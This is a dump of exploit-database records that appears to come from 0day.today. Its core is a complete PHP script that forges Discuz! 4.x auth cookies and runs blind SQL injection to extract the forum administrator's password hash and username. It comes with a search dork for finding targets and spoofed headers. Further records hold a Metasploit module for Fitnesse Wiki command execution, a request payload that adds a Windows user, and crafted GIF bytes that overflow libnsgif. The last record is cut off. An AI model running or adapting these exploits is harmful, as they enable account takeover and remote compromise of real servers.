{"type": "zdt", "lastseen": "2016-04-20T01:16:28", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "Discuz! 4.x SQL Injection / Admin Credentials Disclosure Exploit", "published": "2006-11-28T00:00:00", "href": "http://0day.today/exploit/description/1216", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for unknown platform in category web applications", "hash": "74e40762f220418d79bb0aaf097dc811609d3db9080e1aca6ea9aa0e0117a155", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "================================================================\r\nDiscuz! 4.x SQL Injection / Admin Credentials Disclosure Exploit\r\n================================================================\r\n\r\n\r\n\r\n<?php\r\nprint_r('\r\n---------------------------------------------------------------------------\r\nDiscuz! 4.x SQL injection / admin credentials disclosure exploit\r\ndork: \"powered by discuz!\r\n---------------------------------------------------------------------------\r\n');\r\nif ($argc<3) {\r\n print_r('\r\n---------------------------------------------------------------------------\r\nUsage: php '.$argv[0].' host path OPTIONS\r\nhost: target server (ip/hostname)\r\npath: path to discuz\r\nOptions:\r\n -p[port]: specify a port other than 80\r\n -P[ip:port]: specify a proxy\r\nExample:\r\nphp '.$argv[0].' localhost /discuz/ -P1.1.1.1:80\r\nphp '.$argv[0].' localhost /discuz/ -p81\r\n---------------------------------------------------------------------------\r\n');\r\n die;\r\n}\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\n\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$port=80;\r\n$proxy=\"\";\r\nfor ($i=3; $i<$argc; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\n}\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\necho \"please wait...\\n\";\r\n\r\n//from global.func.php\r\nfunction authcode($string, $operation, $key = '') {\r\n\t$key = $key ? $key : $GLOBALS['discuz_auth_key'];\r\n\t$coded = '';\r\n\t$keylength = 32;\r\n\t$string = $operation == 'DECODE' ? base64_decode($string) : $string;\r\n \tfor($i = 0; $i < strlen($string); $i += 32) {\r\n\t\t$coded .= substr($string, $i, 32) ^ $key;\r\n\t}\r\n\t$coded = $operation == 'ENCODE' ? str_replace('=', '', base64_encode($coded)) : $coded;\r\n\treturn $coded;\r\n}\r\n\r\n//stolen from install.php\r\nfunction random($length) {\r\n\t$hash = '';\r\n\t$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';\r\n\t$max = strlen($chars) - 1;\r\n\tmt_srand((double)microtime() * 1000000);\r\n\tfor($i = 0; $i < $length; $i++) {\r\n\t\t$hash .= $chars[mt_rand(0, $max)];\r\n\t}\r\n\treturn $hash;\r\n}\r\n\r\n$agent=\"Googlebot/2.1\";\r\n//see sql errors... you need auth key,\r\n//it's a value mixed up with the random string in cache_settigns.php and your user-agent, so let's ask ;)\r\n$tt=\"\";for ($i=0; $i<=255; $i++){$tt.=chr($i);}\r\nwhile (1)\r\n{\r\n $discuz_auth_key=random(32);\r\n $packet =\"GET \".$p.\"admincp.php?action=recyclebin HTTP/1.0\\r\\n\";\r\n $packet.=\"CLIENT-IP: 999.999.999.999\\r\\n\";//spoof\r\n $packet.=\"User-Agent: $agent\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"Cookie: adminid=1; cdb_sid=1; cdb_auth=\".authcode(\"suntzu\\tsuntzu\\t\".$tt,\"ENCODE\").\";\\r\\n\";\r\n $packet.=\"Accept: text/plain\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n $packet.=$data;\r\n sendpacketii($packet);\r\n $html=html_entity_decode($html);\r\n $html=str_replace(\"<br />\",\"\",$html);\r\n $t=explode(\"AND m.password='\",$html);\r\n $t2=explode(\"' \",$t[1]);\r\n $pwd_f=$t2[0];\r\n $t=explode(\"AND m.secques='\",$html);\r\n $t2=explode(\"'\\n\",$t[1]);\r\n $secques_f=$t2[0];\r\n $t=explode(\"AND m.uid='\",$html);\r\n $t2=explode(\"'\\x0d\",$t[1]);\r\n $uid_f=$t2[0];\r\n $my_string=$pwd_f.\"\\t\".$secques_f.\"\\t\".$uid_f;\r\n if ((strlen($my_string)==270) and (!eregi(\"=\",$my_string))){\r\n break;\r\n }\r\n}\r\n$temp = authcode(\"suntzu\\tsuntzu\\t\".$tt,\"ENCODE\");\r\n//calculating key...\r\n$key=\"\";\r\nfor ($j=0; $j<32; $j++){\r\n for ($i=0; $i<255; $i++){\r\n $aa=\"\";\r\n if ($j<>0){\r\n for ($k=1; $k<=$j; $k++){\r\n $aa.=\"a\";\r\n }\r\n }\r\n $GLOBALS['discuz_auth_key']=$aa.chr($i);\r\n $t = authcode($temp,\"DECODE\");\r\n if ($t[$j]==$my_string[$j]){\r\n $key.=chr($i);\r\n }\r\n }\r\n}\r\n\r\n//echo \"AUTH KEY ->\".$key.\"\\r\\n\";\r\n$GLOBALS['discuz_auth_key']=$key;\r\n\r\necho \"pwd hash (md5) -> \";\r\n$chars[0]=0;//null\r\n$chars=array_merge($chars,range(48,57)); //numbers\r\n$chars=array_merge($chars,range(97,102));//a-f letters\r\n$j=1;$password=\"\";\r\nwhile (!strstr($password,chr(0)))\r\n{\r\n for ($i=0; $i<=255; $i++)\r\n {\r\n if (in_array($i,$chars))\r\n {\r\n //you can use every char because of base64_decode()...so this bypass magic quotes...\r\n //and some help by extract() to overwrite vars\r\n $sql=\"999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.password,$j,1))=\".$i.\"),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*\";\r\n $packet =\"GET \".$p.\"admincp.php?action=recyclebin& HTTP/1.0\\r\\n\";\r\n $packet.=\"User-Agent: $agent\\r\\n\";\r\n $packet.=\"CLIENT-IP: 1.2.3.4\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"Cookie: adminid=1; cdb_sid=1; cdb_auth=\".authcode(\"suntzu\\tsuntzu\\t\".$sql,\"ENCODE\").\";\\r\\n\";\r\n $packet.=\"Accept: text/plain\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n $packet.=$data;\r\n sendpacketii($packet);\r\n if (eregi(\"action=groupexpiry\",$html)){\r\n $password.=chr($i);echo chr($i);sleep(1);break;\r\n }\r\n }\r\n if ($i==255) {\r\n die(\"\\nExploit failed...\");\r\n }\r\n }\r\n$j++;\r\n}\r\n\r\necho \"\\nadmin user -> \";\r\n$j=1;$admin=\"\";\r\nwhile (!strstr($admin,chr(0)))\r\n{\r\n for ($i=0; $i<=255; $i++)\r\n {\r\n $sql=\"999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.username,$j,1))=\".$i.\"),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*\";\r\n $packet =\"GET \".$p.\"admincp.php?action=recyclebin& HTTP/1.0\\r\\n\";\r\n $packet.=\"User-Agent: $agent\\r\\n\";\r\n $packet.=\"CLIENT-IP: 1.2.3.4\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"Cookie: adminid=1; cdb_sid=1; cdb_auth=\".authcode(\"suntzu\\tsuntzu\\t\".$sql,\"ENCODE\").\";\\r\\n\";\r\n $packet.=\"Accept: text/plain\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n $packet.=$data;\r\n sendpacketii($packet);\r\n if (eregi(\"action=groupexpiry\",$html)){\r\n $admin.=chr($i);echo chr($i);sleep(1);break;\r\n }\r\n if ($i==255) {die(\"\\nExploit failed...\");}\r\n }\r\n$j++;\r\n}\r\n\r\nfunction is_hash($hash)\r\n{\r\n if (ereg(\"^[a-f0-9]{32}\",trim($hash))) {return true;}\r\n else {return false;}\r\n}\r\n\r\nif (is_hash($password)) {\r\n echo \"exploit succeeded...\";\r\n}\r\nelse {\r\n echo \"exploit failed...\";\r\n}\r\n?>\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "id": "1337DAY-ID-1216", "sourceHref": "http://0day.today/exploit/1216", "modified": "2006-11-28T00:00:00", "reporter": "rgod", "viewCount": 1, "enchantments": {"vulnersScore": 3.6}}

{"result": {"zdt": [{"lastseen": "2016-04-19T01:05:52", "references": [], "description": "Libnsgif version 0.1.2 suffers from stack overflow and out-of-bounds read vulnerabilities.", "edition": 1, "reporter": "Hans Jerry Illikainen", "published": "2015-12-17T00:00:00", "type": "zdt", "title": "Libnsgif 0.1.2 Stack Overflow / Out-Of-Bounds Read Exploit", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7505", "CVE-2015-7506"], "modified": "2015-12-17T00:00:00", "href": "http://0day.today/exploit/description/24744", "id": "1337DAY-ID-24744", "sourceData": "Overview\r\n========\r\n\r\nLibnsgif[1] is a decoding library for GIF images. It is primarily\r\ndeveloped and used as part of the NetSurf project.\r\n\r\nAs of version 0.1.2, libnsgif is vulnerable to a stack overflow\r\n(CVE-2015-7505) and an out-of-bounds read (CVE-2015-7506) due to the way\r\nLZW-compressed GIF data is processed.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nsrc/libnsgif.c #80..133:\r\n,----\r\n| /* Maximum LZW bits available\r\n| */\r\n| #define GIF_MAX_LZW 12\r\n| [...]\r\n| static int table[2][(1 << GIF_MAX_LZW)];\r\n| static unsigned char stack[(1 << GIF_MAX_LZW) * 2];\r\n`----\r\n\r\nsrc/libnsgif.c #423..628:\r\n,----\r\n| static gif_result gif_initialise_frame(gif_animation *gif) {\r\n| [...]\r\n| if (gif_data[0] > GIF_MAX_LZW)\r\n| return GIF_DATA_ERROR;\r\n| [...]\r\n| }\r\n`----\r\n\r\n\r\nsrc/libnsgif.c #751..1053:\r\n,----\r\n| gif_result gif_decode_frame(gif_animation *gif, unsigned int frame) {\r\n| [...]\r\n| /* Initialise the LZW decoding\r\n| */\r\n| set_code_size = gif_data[0];\r\n| [...]\r\n| code_size = set_code_size + 1;\r\n| clear_code = (1 << set_code_size);\r\n| end_code = clear_code + 1;\r\n| max_code_size = clear_code << 1;\r\n| max_code = clear_code + 2;\r\n| [...]\r\n| }\r\n`----\r\n\r\n\r\nsrc/libnsgif.c #1145..1169:\r\n,----\r\n| void gif_init_LZW(gif_animation *gif) {\r\n| [...]\r\n| *stack_pointer++ =firstcode;\r\n| }\r\n`----\r\n\r\n\r\nsrc/libnsgif.c #1172..1237:\r\n,----\r\n| static bool gif_next_LZW(gif_animation *gif) {\r\n| [...]\r\n| code = gif_next_code(gif, code_size);\r\n| [...]\r\n| incode = code;\r\n| if (code >= max_code) {\r\n| *stack_pointer++ = firstcode;\r\n| code = oldcode;\r\n| }\r\n| \r\n| /* The following loop is the most important in the GIF decoding cycle as every\r\n| * single pixel passes through it.\r\n| *\r\n| * Note: our stack is always big enough to hold a complete decompressed chunk. */\r\n| while (code >= clear_code) {\r\n| *stack_pointer++ = table[1][code];\r\n| new_code = table[0][code];\r\n| if (new_code < clear_code) {\r\n| code = new_code;\r\n| break;\r\n| }\r\n| *stack_pointer++ = table[1][new_code];\r\n| code = table[0][new_code];\r\n| if (code == new_code) {\r\n| gif->current_error = GIF_FRAME_DATA_ERROR;\r\n| return false;\r\n| }\r\n| }\r\n| \r\n| *stack_pointer++ = firstcode = table[1][code];\r\n| [...]\r\n| oldcode = incode;\r\n| [...]\r\n| }\r\n`----\r\n\r\n\r\nCVE-2015-7505\r\n=============\r\n\r\nSince `gif_next_LZW()' writes onto the stack so long as `code' is at\r\nleast `clear_code', an overflow may eventually occur while processing a\r\nmaliciously crafted image.\r\n\r\nUsing NetSurf as an example:\r\n\r\n,----\r\n| ~/netsurf-all-3.3/netsurf$ gdb -x stack.py --args ./nsgtk stack.gif\r\n| [...]\r\n| stack overflow: ptr: 0x968903, end of stack: 0x968900 (+3)\r\n| stack overflow: ptr: 0x968904, end of stack: 0x968900 (+4)\r\n| stack overflow: ptr: 0x968905, end of stack: 0x968900 (+5)\r\n| stack overflow: ptr: 0xf0000968906, end of stack: 0x968900 (+16492674416646)\r\n| \r\n| Program received signal SIGSEGV, Segmentation fault.\r\n| 0x000000000051a890 in gif_next_LZW (gif=0xbccc00) at src/libnsgif.c:1210\r\n| 1210 *stack_pointer++ = table[1][code];\r\n| (gdb)\r\n`----\r\n\r\n\r\nstack.py:\r\n,----\r\n| class Breakpoint(gdb.Breakpoint):\r\n| def stop(self):\r\n| stack_pointer = get_hex(\"stack_pointer\")\r\n| stack = get_hex(\"&stack\")\r\n| stack_size = get_hex(\"sizeof stack / sizeof *stack\")\r\n| stack_end = stack + stack_size\r\n| \r\n| table_size = get_hex(\"sizeof table / sizeof **table / 2\")\r\n| code = get_hex(\"code\")\r\n| \r\n| if stack_pointer > stack_end:\r\n| print(\"stack overflow: ptr: 0x%x, end of stack: 0x%x (+%d)\" %\r\n| (stack_pointer, stack_end, stack_pointer - stack_end))\r\n| if code >= table_size:\r\n| print(\"out-of-bounds read: code: %d (+%d)\" %\r\n| (code, code - table_size + 1))\r\n| return False\r\n| \r\n| def get_hex(arg):\r\n| res = gdb.execute(\"print/x %s\" % arg, to_string=True)\r\n| x = res.split(\" \")[-1].strip()\r\n| return int(x, 16)\r\n| \r\n| Breakpoint(\"netsurf-all-3.3/libnsgif/src/libnsgif.c:1210\")\r\n| Breakpoint(\"netsurf-all-3.3/libnsgif/src/libnsgif.c:1216\")\r\n| \r\n| gdb.execute(\"run\")\r\n`----\r\n\r\n\r\nstack.gif:\r\n,----\r\n| unsigned char stack[] = {\r\n| /* GIF87a */\r\n| 0x47, 0x49, 0x46, 0x38, 0x37, 0x61,\r\n| \r\n| /* gif_initialise() */\r\n| 0x04, 0x00, /* gif->width */\r\n| 0x04, 0x33, /* gif->height */\r\n| 0x00, /* gif->global_colours */\r\n| 0x00, /* gif->background_index */\r\n| 0x00, /* gif->aspect_ratio */\r\n| \r\n| /* gif_initialise_frame() */\r\n| 0x2c, /* GIF_IMAGE_SEPARATOR */\r\n| 0x00, 0x00, /* offset_x */\r\n| 0x00, 0x00, /* offset_y */\r\n| 0x1b, 0x00, /* width */\r\n| 0x04, 0x00, /* height */\r\n| 0x00, /* flags */\r\n| 0x04, /* code size */\r\n| 0x0d, /* block_size */\r\n| \r\n| /* image data */\r\n| 0x10, 0xcb,\r\n| 0x41, 0xf3,\r\n| 0xf3, 0xf3,\r\n| 0xf3, 0xf3,\r\n| 0xf3, 0xf3,\r\n| 0xf3, 0xf3,\r\n| 0xf3,\r\n| \r\n| /* end of image data */\r\n| 0x00,\r\n| \r\n| /* end of .gif */\r\n| 0x3b\r\n| };\r\n`----\r\n\r\n\r\nCVE-2015-7506\r\n=============\r\n\r\nIf `set_code_size' is 0xc, `clear_code' is assigned a value of 4096.\r\nSince the while-loop in `gif_next_LZW()' executes so long as `code >=\r\nclear_code', an out-of-bounds read might occur due to `code' being used\r\nto dereference `table' (2d array * 4096). A boundary check exist in\r\nthat if `code >= max_code', it's assigned the value of `oldcode' --\r\nhowever, the result may still exceed `max_code' due to the bookkeeping\r\nof the *original* value:\r\n\r\nsrc/libnsgif.c #1172..1237:\r\n,----\r\n| static bool gif_next_LZW(gif_animation *gif) {\r\n| [...]\r\n| incode = code;\r\n| if (code >= max_code) {\r\n| *stack_pointer++ = firstcode;\r\n| code = oldcode;\r\n| }\r\n| [...]\r\n| oldcode = incode;\r\n| [...]\r\n| }\r\n`----\r\n\r\nAgain, using NetSurf as an example:\r\n\r\n,----\r\n| ~/netsurf-all-3.3/netsurf$ gdb -x oob.py --args ./nsgtk oob.gif\r\n| [...]\r\n| out-of-bounds read: code: 6670 (+2575)\r\n| out-of-bounds read: code: 7999 (+3904)\r\n`----\r\n\r\n\r\noob.py:\r\n,----\r\n| class Breakpoint(gdb.Breakpoint):\r\n| def stop(self):\r\n| stack_pointer = get_hex(\"stack_pointer\")\r\n| stack = get_hex(\"&stack\")\r\n| stack_size = get_hex(\"sizeof stack / sizeof *stack\")\r\n| stack_end = stack + stack_size\r\n| \r\n| table_size = get_hex(\"sizeof table / sizeof **table / 2\")\r\n| code = get_hex(\"code\")\r\n| \r\n| if stack_pointer > stack_end:\r\n| print(\"stack overflow: ptr: 0x%x, end of stack: 0x%x (+%d)\" %\r\n| (stack_pointer, stack_end, stack_pointer - stack_end))\r\n| if code >= table_size:\r\n| print(\"out-of-bounds read: code: %d (+%d)\" %\r\n| (code, code - table_size + 1))\r\n| return False\r\n| \r\n| def get_hex(arg):\r\n| res = gdb.execute(\"print/x %s\" % arg, to_string=True)\r\n| x = res.split(\" \")[-1].strip()\r\n| return int(x, 16)\r\n| \r\n| Breakpoint(\"netsurf-all-3.3/libnsgif/src/libnsgif.c:1210\")\r\n| Breakpoint(\"netsurf-all-3.3/libnsgif/src/libnsgif.c:1216\")\r\n| \r\n| gdb.execute(\"run\")\r\n`----\r\n\r\n\r\noob.gif:\r\n,----\r\n| unsigned char oob[] = {\r\n| /* GIF87a */\r\n| 0x47, 0x49, 0x46, 0x38, 0x37, 0x61,\r\n| \r\n| /* gif_initialise() */\r\n| 0x04, 0x00, /* gif->width */\r\n| 0x04, 0x33, /* gif->height */\r\n| 0x00, /* gif->global_colours */\r\n| 0x00, /* gif->background_index */\r\n| 0x00, /* gif->aspect_ratio */\r\n| \r\n| /* gif_initialise_frame() */\r\n| 0x2c, /* GIF_IMAGE_SEPARATOR */\r\n| 0x00, 0x00, /* offset_x */\r\n| 0x00, 0x00, /* offset_y */\r\n| 0x1b, 0x00, /* width */\r\n| 0x04, 0x00, /* height */\r\n| 0x00, /* flags */\r\n| 0x0c, /* code size */\r\n| 0x0d, /* block_size */\r\n| \r\n| /* image data */\r\n| 0x10, 0xcb,\r\n| 0x41, 0xf3,\r\n| 0xf3, 0xf3,\r\n| 0xf3, 0xf3,\r\n| 0xf3, 0xf3,\r\n| 0xf3, 0xf3,\r\n| 0xf3,\r\n| \r\n| /* end of image data */\r\n| 0x00,\r\n| \r\n| /* end of .gif */\r\n| 0x3b\r\n| };\r\n`----\r\n\r\n\r\nSolution\r\n========\r\n\r\nBoth vulnerabilities are fixed in git HEAD[2].\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/24744", "hash": "6c5357e24445aa033da28b50bff576b9afbeb7f1dfbc62ce24b713f2678c8b4b"}, {"lastseen": "2016-04-20T01:37:16", "references": [], "description": "This Metasploit module exploits a vulnerability found in Fitnesse Wiki, version 20140201 and earlier.", "edition": 1, "reporter": "secpod", "published": "2014-03-29T00:00:00", "type": "zdt", "title": "Fitnesse Wiki Remote Command Execution Vulnerability", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1216"], "modified": "2014-03-29T00:00:00", "href": "http://0day.today/exploit/description/22084", "id": "1337DAY-ID-22084", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Fitnesse Wiki Remote Command Execution',\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Fitnesse Wiki, version 20140201\r\n and earlier.\r\n },\r\n 'Author' =>\r\n [\r\n 'Jerzy Kramarz', ## Vulnerability discovery\r\n 'Veerendra G.G <veerendragg {at} secpod.com>', ## Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-1216' ],\r\n [ 'OSVDB', '103907' ],\r\n [ 'BID', '65921' ],\r\n [ 'URL', 'http://secpod.org/blog/?p=2311' ],\r\n [ 'URL', 'http://secpod.org/msf/fitnesse_wiki_rce.rb' ],\r\n [ 'URL', 'http://seclists.org/fulldisclosure/2014/Mar/1' ],\r\n [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1216/' ]\r\n ],\r\n \r\n 'Privileged' => false,\r\n 'Payload' =>\r\n {\r\n 'Space' => 1000,\r\n 'BadChars' => \"\",\r\n 'DisableNops' => true,\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd', ##\r\n ##'RequiredCmd' => 'generic telnet',\r\n ## payloads cmd/windows/adduser and cmd/windows/generic works perfectly\r\n }\r\n },\r\n 'Platform' => %w{ win },\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' =>\r\n [\r\n ['Windows', { 'Platform' => 'win' } ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Feb 25 2014'))\r\n \r\n register_options(\r\n [\r\n Opt::RPORT(80),\r\n OptString.new('TARGETURI', [true, 'Fitnesse Wiki base path', '/'])\r\n ], self.class)\r\n end\r\n \r\n def check\r\n print_status(\"#{peer} - Trying to detect Fitnesse Wiki\")\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path)\r\n })\r\n \r\n if res && res.code == 200 && res.body.include?(\">FitNesse<\")\r\n print_good(\"#{peer} - FitNesse Wiki Detected!\")\r\n return Exploit::CheckCode::Detected\r\n end\r\n \r\n return Exploit::CheckCode::Safe\r\n end\r\n \r\n def http_send_command(command)\r\n \r\n ## Construct random page in WikiWord format\r\n uri = normalize_uri(target_uri.path, 'TestP' + rand_text_alpha_lower(7))\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri + \"?edit\"\r\n })\r\n \r\n if !res || res.code != 200\r\n fail_with(Failure::Unknown, \"#{peer} - Unexpected response, exploit probably failed!\")\r\n end\r\n \r\n print_status(\"#{peer} - Retrieving edit time and ticket id\")\r\n \r\n ## Get Edit Time and Ticket Id from the response\r\n res.body =~ /\"editTime\" value=\"((\\d)+)\"/\r\n edit_time = $1\r\n \r\n res.body =~ /\"ticketId\" value=\"((-?\\d)+)\"/\r\n ticket_id = $1\r\n \r\n ## Validate we are able to extract Edit Time and Ticket Id\r\n if !edit_time or !ticket_id\r\n print_error(\"#{peer} - Failed to get Ticket Id / Edit Time.\")\r\n return\r\n end\r\n \r\n print_status(\"#{peer} - Attempting to create '#{uri}'\")\r\n \r\n ## Construct Referer\r\n referer = \"http://#{rhost}:#{rport}\" + uri + \"?edit\"\r\n \r\n ## Construct command to be executed\r\n page_content = '!define COMMAND_PATTERN {%m}\r\n!define TEST_RUNNER {' + command + '}'\r\n \r\n print_status(\"#{peer} - Injecting the payload\")\r\n ## Construct POST request to create page with malicious commands\r\n ## inserted in the page\r\n res = send_request_cgi(\r\n {\r\n 'uri' => uri,\r\n 'method' => 'POST',\r\n 'headers' => {'Referer' => referer},\r\n 'vars_post' =>\r\n {\r\n 'editTime' => edit_time,\r\n 'ticketId' => ticket_id,\r\n 'responder' => 'saveData',\r\n 'helpText' => '',\r\n 'suites' => '',\r\n '__EDITOR__1' => 'textarea',\r\n 'pageContent' => page_content,\r\n 'save' => 'Save',\r\n }\r\n })\r\n \r\n if res && res.code == 303\r\n print_status(\"#{peer} - Successfully created '#{uri}' with payload\")\r\n end\r\n \r\n ## Execute inserted command\r\n print_status(\"#{peer} - Sending exploit request\")\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri + \"?test\"\r\n })\r\n \r\n if res && res.code == 200\r\n print_status(\"#{peer} - Successfully sent exploit request\")\r\n end\r\n \r\n ## Cleanup by deleting the created page\r\n print_status(\"#{peer} - Execting cleanup routine\")\r\n referer = \"http://#{rhost}:#{rport}\" + uri + \"?deletePage\"\r\n res = send_request_cgi(\r\n {\r\n 'uri' => uri + \"?deletePage\",\r\n 'method' => 'POST',\r\n 'headers' => {'Referer' => referer},\r\n 'vars_post' =>\r\n {\r\n 'confirmed' => 'Yes',\r\n }\r\n })\r\n end\r\n \r\n def exploit\r\n http_send_command(payload.encoded)\r\n end\r\nend\n\n# 0day.today [2016-04-20] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "http://0day.today/exploit/22084", "hash": "7c1b20d11d9237af2c22fea5f7837898218533784853c32409efa38710415363"}, {"lastseen": "2016-04-20T01:37:13", "references": [], "description": "Fitnesse Wiki 20131110 suffers from a remote command execution vulnerability.", "edition": 1, "reporter": "Jerzy Kramarz", "published": "2014-03-02T00:00:00", "type": "zdt", "title": "Fitnesse Wiki 20131110 Remote Command Execution", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1216"], "modified": "2014-03-02T00:00:00", "href": "http://0day.today/exploit/description/21972", "id": "1337DAY-ID-21972", "sourceData": "Vulnerability title: Remote Command Execution in Fitnesse Wiki\r\nCVE: CVE-2014-1216\r\nVendor: Fitnesse\r\nProduct: Wiki\r\nAffected version: v20131110 and earlier\r\nFixed version: N/A\r\nReported by: Jerzy Kramarz\r\n\r\nDetails:\r\n\r\nThe Fitnesse wiki does not validate the syntax of edited pages to\r\nvalidate whether the pages are introducing any extra parameters that\r\ncould be executed in the context of the application. This vulnerability\r\ncould be exploited by remote attackers to introduce external commands\r\ninto the workflow of the application that would execute them.\r\n\r\nExploit\r\n\r\nAfter creating a new page in the wiki (or editing already existing page) sending a request similar to below would trigger the vulnerability:\r\n\r\nPOST /<any page> HTTP/1.1\r\nHost: <host>:<port>\r\nProxy-Connection: keep-alive\r\nContent-Length: 374\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nOrigin: http://<host>:<port>\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36\r\nContent-Type: application/x-www-form-urlencoded\r\nDNT: 1\r\nReferer: http://<host>:<port>/<page>?edit\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: textwrapon=false; wysiwyg=textarea\r\n\r\neditTime=1384209902568&ticketId=-7153973663219190464&responder=saveData&helpText=&suites=&__EDITOR__1=textarea&pageContent=%21define+COMMAND_PATTERN+%7B%25m+%7C%7C+%7D%0D%0A%21define+TEST_RUNNER+%7Bcmd.exe+%2Fc+%22net+user+XXXXXXXX+XXXXXXXX+%2Fadd%22%7D%0D%0A%21path+dotnet4%5Cdbfit.dll%0D%0A%21path+dotnet4%5Cdbfit.sqlserver.dll%0D%0A%21path+dotnet2%5C*.dll&save=Save\r\n\r\nAfter editing the page with content specified above, the vulnerability could be triggered by visiting \u2018http://<host>:<port>/<created/edited page name>?test\u2019\r\n\r\n\r\n \r\n\r\nFurther details at:\r\nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1216/\n\n# 0day.today [2016-04-20] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": 